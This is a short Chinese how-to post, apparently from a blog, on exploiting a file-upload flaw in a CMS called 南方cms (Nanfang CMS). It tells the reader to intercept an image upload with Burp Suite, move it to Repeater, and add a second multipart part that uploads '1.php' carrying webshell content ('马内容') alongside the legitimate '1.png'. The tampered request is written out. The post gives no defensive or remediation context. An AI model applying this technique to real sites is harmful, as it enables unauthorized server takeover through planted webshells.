这个漏洞在南方cms 上出现的

主要是上传时候利用bp抓包 

然后鼠标右键吧数据包发送到Repeater模块

找到你上传的包内容 一般是

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容 

------61234564788--

改成

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容 

------61234564788

Content-Disposition: form-data; name="FileName1"; filename=“1.php”

马内容

------61234564788--

相关文章:

  • 2022-02-09
  • 2022-02-20
  • 2022-01-24
  • 2022-02-18
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-10-08
猜你喜欢
  • 2021-09-06
  • 2021-06-02
  • 2021-07-04
  • 2022-01-24
  • 2021-09-07
  • 2021-05-28
相关资源
相似解决方案